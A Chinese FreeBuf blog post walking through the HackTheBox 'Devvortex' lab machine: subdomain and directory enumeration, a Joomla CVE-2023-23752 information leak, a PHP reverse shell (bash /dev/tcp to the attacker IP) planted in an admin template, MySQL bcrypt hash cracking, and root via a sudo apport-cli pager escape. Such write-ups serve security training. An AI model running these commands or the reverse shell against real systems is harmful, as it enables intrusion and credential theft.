主站

分类

漏洞工具极客 Web安全系统安全网络安全无线安全设备/客户端安全数据安全安全管理企业安全工控安全

特色

头条人物志活动视频观点招聘报告资讯区块链安全标准与合规容器安全公开课

点我创作

试试在FreeBuf发布您的第一篇文章让安全圈留下您的足迹

我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序把安全装进口袋

Web安全

[Meachines][Easy]Devvortex

maptnh 2024-04-22 19:09:15 57323

Main

$ nmap -p- 10.10.11.242 --min-rate 1000

# echo '10.10.11.242 devvortex.htb'>>/etc/hosts

子域名爆破

$ apt install seclists

$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://devvortex.htb/" -H "Host: FUZZ.devvortex.htb" --hl 7

$ echo '10.10.11.242 dev.devvortex.htb'>>/etc/hosts

$ gobuster dir --url "http://dev.devvortex.htb/" --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt

$ curl http://dev.devvortex.htb/robots.txt

$ whatweb http://dev.devvortex.htb/administrator

searchsploit

CVE-2023-23752:未授权访问

从Exp中fetch_users是获取用户的函数

$ curl http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq

username:lewis password:P4ntherg0t1n5r3c0n##

http://dev.devvortex.htb/administrator/

导航至System->Templates->Administrator Templates

index.php把反向shell写进去就好了,Save

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.23/10032 0>&1'");

$ nc -lvnp 10032

无法权限不足读取用户logan的文件

提升shell方法1

script /dev/null -c /bin/bash#这个命令使用script命令将会话记录写入 /dev/null，并在新的 Bash 会话中执行 /bin/bash，即启动一个新的 Bash shell。
CTRL + Z# 将当前进程挂起（即暂停执行），并返回到终端提示符。这样做是为了在后台执行一些任务或者进行一些其他操作，而不影响当前进程。
stty raw -echo; fg# 将终端设置为原始（raw）模式和禁用回显（echo），然后将挂起的进程（即刚才启动的新的 Bash 会话）移动到前台运行（foreground）。这样做是为了让新的 Bash 会话能够正常运行，并且不会受到终端设置的影响。
# 按下 Enter 键两次。这是因为在使用 stty raw -echo; fg 命令之后，终端处于原始模式，不会像平常一样处理换行符。因此，需要按下 Enter 键两次以确保命令输入被传递到新的 Bash 会话中
export TERM=xterm# 用于设置环境变量 TERM 的值为 xterm。TERM 环境变量用于指定当前终端的类型，xterm 是一种常见的终端类型。设置为 xterm 可以帮助正确地显示终端中的文本和颜色，以及适应终端的特性和功能。

提升shell方法2:
$ SHELL=/bin/bash script -q /dev/null

www-data@devvortex:~/dev.devvortex.htb/administrator$ netstat -ano

3306端口开放着mysql服务

$ mysql -u lewis -p

P4ntherg0t1n5r3c0n##

mysql>show databases;
mysql>use joomla;
mysql>show tables;
mysql> select username,password from sd4fg_users;

$ echo "\$2y\$10\$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12">hash

保存哈希

$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash

username:logan password:tequieromucho

www-data@devvortex:~/dev.devvortex.htb/administrator$ su logan

User Flag

logan@devvortex:/var/www/dev.devvortex.htb/administrator$ cat /home/logan/user.txt

a2e439ebea0891abde76fa39322ee67a

Root Flag

logan@devvortex:/var/www/dev.devvortex.htb/administrator$ sudo -l

logan用户只能执行和读该文件/usr/bin/apport-cli,不能进行修改

打开是一个python文件,我们将他下载下来分析一下

我们首先锁定系统执行命令的sys,os函数库和input,read,write一些函数,让后逆向找到利用点

跟进父类函数

跟进CLIDialog父类函数中的run,可以看到是一个选择页面

logan@devvortex:/var/www/dev.devvortex.htb/administrator$sudo /usr/bin/apport-cli

运行一下看界面

当我们输入一个字符时,会将其转为大写,然后寻找该字符在列表中的索引位置,然后索引+1,最后返回一个int数据

这里的CLIDialog.run()也就类似于input函数

第一处:CLIUserInterface.ui_present_report_details() 这是一个显示报告的函数

第二处:CLIUserInterface.ui_info_message() CLIUserInterface.ui_error_message()这是一个ui消息显示和错误消息显示

第三处:CLIUserInterface.ui_question_yesno() CLIUserInterface.ui_question_choice() 一个选择函数...

有趣的是当分析到CLIUserInterface.ui_present_report_details()中调用了一个工具

/usr/bin/sensible-pager:是一个命令行工具，用于选择并执行适合当前环境的默认分页器（pager）。在Unix和Linux系统中，分页器是用于浏览文本文件内容的工具，通常用于查看长文本文件或命令输出。

我们可以在kali中来演示如何利用/usr/bin/sensible-pager进入命令行模式

此时我们输入!/bin/bash时候,!来引导外部命令/bin/bash成功获取shell

回到靶机同样方法去获取shell

这里如果运行过一次很可能会出现异常,加-f参数进入调试模式

logan@devvortex:/var/www/dev.devvortex.htb/administrator$ sudo /usr/bin/apport-cli --help

$ sudo /usr/bin/apport-cli -f

随便写数字,到选择这一步就好了

输入V,进入到报告页面输入,!/bin/bash

成功提权

ebbf314456c1a1428c243b579b031a9f

# 渗透测试 # 黑客 # web安全 # 漏洞分析

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

本文为 maptnh 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

HackTheBox

展开更多

相关推荐

重生之我在知识大陆直播撕开网安行业内幕

重生之我在知识大陆直播撕开网安行业内幕

活动

这一次，我要做网安超级白帽，把属于我的全都拿回来！

帮会小助手

210675围观 · 2收藏 2024-04-26

[Meachines][Medium]WifineticTwo

[Meachines][Medium]WifineticTwo

Web安全

#工控安全 #OpenPLC #openwrt

75928围观 2024-04-25

WordPress Backup Migration远程代码执行漏洞(CVE-2023-6553)分析

WordPress Backup Migration远程代码执行漏洞(CVE-2023-6553)分析

漏洞

Backup Migration 小于1.3.8版本中存在远程代码执行漏洞，在CVSS3.1中评分9.8，危险等级为危急。

网宿安全演武实验室

127499围观 2024-04-25

JavaScript精粹：26个关键字深度解析，编写高质量代码的秘诀！

JavaScript精粹：26个关键字深度解析，编写高质量代码的秘诀！

Web安全

JavaScript关键字是一种特殊的标识符，它们在语言中有固定的含义，不能用作变量名或函数名。这些关键字是JavaScript的基础，理解...

57000围观 2024-04-25

XXE攻击内网web应用原创

XXE攻击内网web应用

漏洞

利用XXE攻击内网st2

94808围观 · 2收藏 2024-04-25

maptnh LV.9

Ценность жизни выше, чем кража данных.

340 文章数
62 关注者

[CISSP] [5] 保护资产安全

2025-04-02

[CISSP] [4] 法律、法规

2025-04-02

如何在未知iv值情况下如何进行手工破译ROT密文?

2025-04-02